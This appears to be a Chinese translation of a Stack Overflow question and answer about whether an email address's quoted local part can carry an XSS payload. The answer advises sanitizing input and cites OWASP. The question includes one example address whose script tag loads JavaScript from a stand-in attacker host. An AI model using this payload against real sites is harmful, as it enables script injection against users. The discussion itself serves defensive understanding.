我想知道电子邮件地址是否可以用于 XSS 攻击。
假设有一个网站,您可以在其中注册并提供他的电子邮件地址。如果有人想攻击给定的网站,他或她可能会创建一个电子邮件地址,例如:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
然后使用此电子邮件地址攻击该网站。
电子邮件地址中是否允许引用或脚本标记?
最佳答案
您示例中的电子邮件地址似乎有效。唯一不寻常的字符是引号 " - 其他人是有效的。
Wikipedia表明您指定的电子邮件地址有效。
您需要确保在呈现之前对任意用户输入进行清理。
首先,您可能需要引用有关 XSS 的信息。和 prevention可在 OWASP 获得.
关于security - 是否可以通过电子邮件地址进行 XSS 攻击?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/17480809/